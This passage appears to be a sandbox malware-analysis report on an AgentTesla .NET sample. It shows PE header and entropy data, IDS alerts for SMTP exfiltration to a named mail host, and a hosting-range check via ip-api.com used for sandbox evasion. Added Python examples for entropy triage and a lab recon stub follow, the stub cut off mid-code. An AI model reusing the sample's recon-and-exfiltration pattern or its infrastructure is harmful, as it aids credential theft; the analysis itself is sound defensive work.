                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5f................0.................. ........@.. .......................@............@................................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x4ae1fe
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xD3B46635 [Mon Jul 20 23:20:21 2082 UTC] (far in the future, so not a usable build date: the field was either set deliberately or, as is common for .NET assemblies built with a deterministic compiler, filled with a hash-derived pseudo-timestamp)
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                (the rest of the entrypoint dump is zero bytes, which the disassembler renders as a long run of add byte ptr [eax], al; it is padding, not code)
                                                Note: 0x00402000 is Imagebase 0x400000 plus the IAT at RVA 0x2000 (size 0x8, a single slot; see the data directories below), and the only import is mscoree.dll!_CorExeMain. This is the standard native stub of a managed executable: the sample's real code is CIL reached through the CLR header (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR at RVA 0x2008), so disassembling the native entrypoint says nothing about its behaviour.
                                                Name                                  Virtual Address  Virtual Size  Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT          0xae1a9          0x4f          .text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb0000          0x5b4         .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb2000          0xc           .reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG           0xac3b0          0x70          .text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                                .text   0x2000           0xac204       0xac400   17cabe620472f0c257b2cedd38cc99cd  False     0.9603535468069666  data       7.958322330066031    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc   0xb0000          0x5b4         0x600     33ef794e6d65abaf30dbe1bdd27f572a  False     0.421875            data       4.093666692462753    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc  0xb2000          0xc           0x200     35ccd7c3a6214fefa89d78fff662425f  False     0.041015625         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xb0090 | 0x324 | data | | | 0.43283582089552236
RT_MANIFEST | 0xb03c4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
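
The .text section above has an entropy of 7.96 out of a possible 8 and a ZLIB complexity of 0.96, which is what encrypted or compressed content looks like: the only import is mscoree.dll!_CorExeMain, so the real payload is unpacked by managed code at run time rather than being readable in the on-disk image. The check is quick to reproduce on any file. What follows is an added example, not code from the report or from Joe Sandbox: a standard-library-only walk of the PE section table with per-section Shannon entropy. The 7.0 threshold for flagging a section and the in-memory PE fixture built by build_minimal_pe() are assumptions made here so the script runs offline; call triage_sections() on the bytes of a real file to use it.

```python
import math
import struct
from collections import Counter

# Added example, not code from the Joe Sandbox report: walk the PE section table with the
# standard library only and compute Shannon entropy per section. PACKED_THRESHOLD is an
# assumption (a common rule of thumb), not a value taken from the report.
PACKED_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant data, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Yield (name, virtual_address, virtual_size, raw_size, raw_bytes) per section.

    Only the fields the walk needs are read: e_lfanew from the DOS header, then
    NumberOfSections and SizeOfOptionalHeader from the COFF header, then the
    40-byte IMAGE_SECTION_HEADER entries that follow the optional header.
    """
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size
    for i in range(num_sections):
        name, vsize, vaddr, rsize, rptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        yield (name.rstrip(b"\0").decode("ascii", "replace"), vaddr, vsize, rsize,
               image[rptr:rptr + rsize])


def triage_sections(image: bytes) -> list:
    """One dict per section with its entropy and whether it crosses PACKED_THRESHOLD."""
    rows = []
    for name, vaddr, vsize, rsize, raw in pe_sections(image):
        ent = shannon_entropy(raw)
        rows.append({"name": name, "vaddr": vaddr, "vsize": vsize, "rsize": rsize,
                     "entropy": round(ent, 3), "packed": ent >= PACKED_THRESHOLD})
    return rows


def build_minimal_pe(sections, file_align=0x200, sect_align=0x1000) -> bytes:
    """Constructed test fixture (assumption, not the analysed sample): a minimal PE32 image,
    not loadable and with a mostly zero optional header, whose section table the parser
    above can walk. `sections` is a list of (name, raw_bytes)."""
    opt_size, e_lfanew = 0xE0, 0x40
    hdr_len = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    data_start = -(-hdr_len // file_align) * file_align  # round up to file alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    headers, bodies, rptr, vaddr = b"", b"", data_start, sect_align
    for name, raw in sections:
        rsize = -(-len(raw) // file_align) * file_align
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(raw),
                               vaddr, rsize, rptr, 0, 0, 0, 0, 0x60000020)
        bodies += raw.ljust(rsize, b"\0")
        rptr += rsize
        vaddr += -(-len(raw) // sect_align) * sect_align
    return (dos + b"PE\0\0" + coff + opt + headers).ljust(data_start, b"\0") + bodies


if __name__ == "__main__":
    # Stand-in for the sample's layout: a high-entropy .text, a small .rsrc, a tiny .reloc.
    image = build_minimal_pe([
        (".text", bytes(range(256)) * 16),
        (".rsrc", b'<?xml version="1.0"?><assembly/>'.ljust(0x600, b"\0")),
        (".reloc", b"\0" * 12),
    ])
    for row in triage_sections(image):
        print(f"{row['name']:<8} va=0x{row['vaddr']:x} entropy={row['entropy']:.3f} "
              f"{'PACKED?' if row['packed'] else ''}")
```

Entropy is computed over SizeOfRawData, so file-alignment padding pulls small sections down slightly; that is the same number the report shows and is fine for triage. A high-entropy .text in a .NET binary whose only native import is _CorExeMain is the cue to dump the process after the unpacker has run rather than spend time on the on-disk image.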
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/27/24-12:30:54.369627 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49709 | 587 | 192.168.2.6 | 208.91.198.143
05/27/24-12:30:51.051527 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49705 | 587 | 192.168.2.6 | 208.91.198.143
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2024 12:30:46.843614101 CEST | 49702 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:46.843651056 CEST | 443 | 49702 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:46.843722105 CEST | 49702 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:46.852186918 CEST | 49702 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:46.852207899 CEST | 443 | 49702 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:47.360549927 CEST | 443 | 49702 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:47.360621929 CEST | 49702 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:47.365833044 CEST | 49702 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:47.365842104 CEST | 443 | 49702 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:47.366120100 CEST | 443 | 49702 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:47.416105986 CEST | 49702 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:47.454904079 CEST | 49702 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:47.498501062 CEST | 443 | 49702 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:47.625962019 CEST | 443 | 49702 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:47.626146078 CEST | 443 | 49702 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:47.626214027 CEST | 49702 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:47.632426023 CEST | 49702 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:47.654148102 CEST | 49703 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:47.659106970 CEST | 80 | 49703 | 208.95.112.1 | 192.168.2.6
May 27, 2024 12:30:47.659435034 CEST | 49703 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:47.659480095 CEST | 49703 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:47.664325953 CEST | 80 | 49703 | 208.95.112.1 | 192.168.2.6
May 27, 2024 12:30:48.125622034 CEST | 80 | 49703 | 208.95.112.1 | 192.168.2.6
May 27, 2024 12:30:48.181838989 CEST | 49703 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:49.020311117 CEST | 49703 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:49.028970003 CEST | 80 | 49703 | 208.95.112.1 | 192.168.2.6
May 27, 2024 12:30:49.029220104 CEST | 49703 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:49.343743086 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:49.348690987 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:49.348752022 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:50.066251040 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.066463947 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:50.071801901 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.221824884 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.222951889 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:50.227943897 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.380045891 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.380274057 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:50.385267019 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.541346073 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.541837931 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:50.547630072 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.686789989 CEST | 49707 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:50.686887026 CEST | 443 | 49707 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:50.687031031 CEST | 49707 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:50.689943075 CEST | 49707 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:50.689985037 CEST | 443 | 49707 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:50.700901031 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.701725006 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:50.706628084 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.895111084 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:50.895273924 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:50.900221109 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:51.050965071 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:51.051527023 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:51.051582098 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:51.051630020 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:51.051630020 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:51.056437969 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:51.056464911 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:51.056644917 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:51.056658030 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:51.161542892 CEST | 443 | 49707 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:51.161642075 CEST | 49707 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:51.163077116 CEST | 49707 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:51.163105965 CEST | 443 | 49707 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:51.163382053 CEST | 443 | 49707 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:51.273992062 CEST | 49707 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:51.318505049 CEST | 443 | 49707 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:51.423968077 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:51.447643042 CEST | 443 | 49707 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:51.447724104 CEST | 443 | 49707 | 172.67.74.152 | 192.168.2.6
May 27, 2024 12:30:51.447793007 CEST | 49707 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:51.450604916 CEST | 49707 | 443 | 192.168.2.6 | 172.67.74.152
May 27, 2024 12:30:51.452931881 CEST | 49708 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:51.457880020 CEST | 80 | 49708 | 208.95.112.1 | 192.168.2.6
May 27, 2024 12:30:51.457981110 CEST | 49708 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:51.458065033 CEST | 49708 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:51.462877989 CEST | 80 | 49708 | 208.95.112.1 | 192.168.2.6
May 27, 2024 12:30:51.603605032 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:51.934434891 CEST | 80 | 49708 | 208.95.112.1 | 192.168.2.6
May 27, 2024 12:30:51.978591919 CEST | 49708 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:52.822630882 CEST | 49708 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:52.824278116 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:52.829176903 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:52.829262018 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:52.847162962 CEST | 80 | 49708 | 208.95.112.1 | 192.168.2.6
May 27, 2024 12:30:52.847208023 CEST | 49708 | 80 | 192.168.2.6 | 208.95.112.1
May 27, 2024 12:30:53.386446953 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:53.386634111 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:53.391478062 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:53.542809010 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:53.543119907 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:53.548041105 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:53.711282015 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:53.712167025 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:53.717132092 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:53.874255896 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:53.874505043 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:53.879473925 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.032294989 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.032536030 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:54.037472963 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.211364985 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.211828947 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:54.216711998 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.368985891 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.369626999 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:54.369782925 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:54.369782925 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:54.370040894 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:30:54.376722097 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.377239943 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.377249002 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.377259016 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.757467031 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:30:54.806700945 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:32:29.042032957 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:32:29.046977043 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:32:29.197567940 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:32:29.197591066 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:32:29.197786093 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:32:29.197786093 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:32:29.202783108 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:32:32.838365078 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:32:32.843630075 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:32:32.998485088 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:32:32.998648882 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
May 27, 2024 12:32:32.998763084 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:32:32.998786926 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143
May 27, 2024 12:32:33.003648043 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2024 12:30:46.819041967 CEST | 50401 | 53 | 192.168.2.6 | 1.1.1.1
May 27, 2024 12:30:46.825964928 CEST | 53 | 50401 | 1.1.1.1 | 192.168.2.6
May 27, 2024 12:30:47.645761013 CEST | 56428 | 53 | 192.168.2.6 | 1.1.1.1
May 27, 2024 12:30:47.652786970 CEST | 53 | 56428 | 1.1.1.1 | 192.168.2.6
May 27, 2024 12:30:49.020998955 CEST | 62704 | 53 | 192.168.2.6 | 1.1.1.1
May 27, 2024 12:30:49.342091084 CEST | 53 | 62704 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 27, 2024 12:30:46.819041967 CEST | 192.168.2.6 | 1.1.1.1 | 0xc4f0 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
May 27, 2024 12:30:47.645761013 CEST | 192.168.2.6 | 1.1.1.1 | 0x64d | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
May 27, 2024 12:30:49.020998955 CEST | 192.168.2.6 | 1.1.1.1 | 0xb22a | Standard query (0) | smtp.santonswitchgears.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 27, 2024 12:30:46.825964928 CEST | 1.1.1.1 | 192.168.2.6 | 0xc4f0 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
May 27, 2024 12:30:46.825964928 CEST | 1.1.1.1 | 192.168.2.6 | 0xc4f0 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
May 27, 2024 12:30:46.825964928 CEST | 1.1.1.1 | 192.168.2.6 | 0xc4f0 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
May 27, 2024 12:30:47.652786970 CEST | 1.1.1.1 | 192.168.2.6 | 0x64d | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
May 27, 2024 12:30:49.342091084 CEST | 1.1.1.1 | 192.168.2.6 | 0xb22a | No error (0) | smtp.santonswitchgears.com | us2.smtp.mailhostbox.com | | CNAME (Canonical name) | IN (0x0001) | false
May 27, 2024 12:30:49.342091084 CEST | 1.1.1.1 | 192.168.2.6 | 0xb22a | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.143 | A (IP address) | IN (0x0001) | false
May 27, 2024 12:30:49.342091084 CEST | 1.1.1.1 | 192.168.2.6 | 0xb22a | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.224 | A (IP address) | IN (0x0001) | false
May 27, 2024 12:30:49.342091084 CEST | 1.1.1.1 | 192.168.2.6 | 0xb22a | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.225 | A (IP address) | IN (0x0001) | false
May 27, 2024 12:30:49.342091084 CEST | 1.1.1.1 | 192.168.2.6 | 0xb22a | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.223 | A (IP address) | IN (0x0001) | false
                                                • api.ipify.org
                                                • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49703 | 208.95.112.1 | 80 | 2760 | C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:30:47.659480095 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
May 27, 2024 12:30:48.125622034 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Mon, 27 May 2024 10:30:47 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false
The hosting field of ip-api.com reports whether the requesting address belongs to a hosting or data-center range; the "false" returned here means the sandbox's egress address passed the sample's check and execution continued.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49708 | 208.95.112.1 | 80 | 5308 | C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:30:51.458065033 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
May 27, 2024 12:30:51.934434891 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Mon, 27 May 2024 10:30:51 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 56
X-Rl: 43
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49702 | 172.67.74.152 | 443 | 2760 | C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-27 10:30:47 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-05-27 10:30:47 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Mon, 27 May 2024 10:30:47 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 88a554e2fa098c96-EWR
2024-05-27 10:30:47 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
Data Ascii: 8.46.123.175


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49707 | 172.67.74.152 | 443 | 5308 | C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-27 10:30:51 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-05-27 10:30:51 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Mon, 27 May 2024 10:30:51 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 88a554fadc6c41f2-EWR
2024-05-27 10:30:51 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
Data Ascii: 8.46.123.175
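
Both processes (PIDs 2760 and 5308) run the same two recon requests before opening SMTP: api.ipify.org for the public egress address and ip-api.com /line/?fields=hosting for whether that address sits in a hosting range. In an isolated lab with no internet route both requests fail and the sample never reaches the SMTP stage. What follows is an added example, not code from the report or from either service: a small stub that answers both endpoints, meant for a lab where DNS for api.ipify.org and ip-api.com is pointed at the host running it. The reported address (FAKE_PUBLIC_IP), the ip-api.com field values, and answering hosting with false are assumptions made for the lab; false is the value the report shows the sample receiving, and what it does on true is not shown on this page.

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Added example (not from the Joe Sandbox report): lab stub for the two recon endpoints.
# FAKE_PUBLIC_IP and the IP_API_FIELDS values are assumptions; "hosting" is answered
# false, the value the report shows the sample receiving before it moved on to SMTP.
FAKE_PUBLIC_IP = "203.0.113.10"  # assumption: a TEST-NET-3 documentation address
IP_API_FIELDS = {                 # assumption: a reduced subset of ip-api.com's field set
    "status": "success", "query": FAKE_PUBLIC_IP, "hosting": False, "proxy": False,
    "country": "United States", "countryCode": "US",
}


def respond(host: str, raw_path: str):
    """Return (status, content_type, body) for a GET; pure, so it can be tested offline.

    Routing is by Host header first, then by path, so a client that sends no Host header
    (or the wrong one) still reaches the ip-api.com emulation for /line/ and /json/.
    """
    url = urlparse(raw_path)
    query = parse_qs(url.query)
    if host.split(":")[0] == "ip-api.com" or url.path.startswith(("/line", "/json")):
        wanted = query.get("fields", ["status,country,query"])[0].split(",")
        values = {f: IP_API_FIELDS[f] for f in wanted if f in IP_API_FIELDS}
        if url.path.startswith("/line"):
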